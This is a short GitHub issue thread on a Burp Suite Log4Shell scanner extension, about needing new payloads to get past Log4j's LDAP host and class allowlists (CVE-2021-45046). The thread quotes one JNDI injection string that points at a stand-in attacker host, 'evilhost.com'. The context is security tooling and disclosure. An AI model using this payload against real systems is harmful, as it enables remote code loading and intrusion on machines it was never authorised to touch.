burp-log4shell icon indicating copy to clipboard operation
burp-log4shell copied to clipboard
verified publisher icon silentsignal

Additional payloads for allowedLdapHost and allowedClasses bypass

Open v-p-b opened this issue 4 years ago • 2 comments

This will require improved payloads:

https://twitter.com/marcioalm/status/1471740771581652995

Example from the twitter:

${jndi:ldap://127.0.0.1#evilhost.com:1389/a}

v-p-b avatar Dec 17 '21 08:12 v-p-b

Unfortunately it seems we won't be able to use collaborator for this :(

More info: https://twitter.com/buherator/status/1472102632105951232

v-p-b avatar Dec 18 '21 07:12 v-p-b

FTR: This would be CVE-2021-45046

v-p-b avatar Jan 18 '22 11:01 v-p-b